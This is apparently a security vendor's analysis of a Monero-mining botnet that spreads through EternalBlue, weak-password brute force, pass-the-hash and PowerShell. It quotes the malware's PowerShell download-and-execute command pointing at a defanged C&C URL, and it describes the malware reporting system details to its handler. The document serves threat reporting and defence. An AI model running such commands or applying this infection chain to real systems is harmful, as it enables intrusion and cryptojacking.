We detected a cryptobot malware that uses multiple propagation and infection methods to drop a Monero cryptocurrency miner onto as many systems and servers as possible. Initially observed in China in early 2019, the methods it previously used to infect networks involved accessing weak passwords and using pass-the-hash technique, Windows admin tools, and brute force attacks with publicly available codes.
However, this new case we found in Japan involves the use of the EternalBlue exploit and the abuse of PowerShell to break into the system and evade detection.
It appears that the attackers are now expanding this botnet to other countries; our telemetry has since detected this threat in Australia, Taiwan, Vietnam, Hong Kong, and India.
The malware’s primary propagation technique involves trying a list of weak credentials to log into other computers connected to the network.
Instead of directly sending itself into all the systems connected, the remote command changes the firewall and port forwarding settings of the infected machines, setting up a scheduled task to download and execute an updated copy of the malware. The downloaded PowerShell script is executed with
IEX (New-Object Net.WebClient).downloadstring(‘hxxp://v.beahh[.]com/wm?hp’)
The malware also uses the pass the hash method, wherein it authenticates itself to remote servers using the user’s hashed password. By using the Get-PassHashes command, the malware acquires the hashes stored in the machine, as well as the hashes of the weak passwords listed. After acquiring the hashes, the malware utilizes Invoke-SMBClient – another publicly available script – to perform file share operations using pass-the-hash.
Once a machine is infected via one of the methods, the malware acquires the MAC address and collects information on the anti-virus products installed in the machine. It downloads another obfuscated PowerShell script from the C&C server, and analysis revealed that the download URL sends back the information it acquired earlier to its handler. The downloaded PowerShell is a dropper, responsible for downloading and executing the malware’s components, most of which are copies of itself.
It is recommended to update systems with available patches from legitimate vendors as soon as possible. Users of legacy software should also update with virtual patches from credible sources. As of this writing, the malware is still active and was updated, connecting to a new URL. Use complicated passwords and authorize layered authentication whenever possible. Enterprises are also advised to enable a multi-layered protection system that can actively block these threats and malicious URLs from the gateway to the endpoint.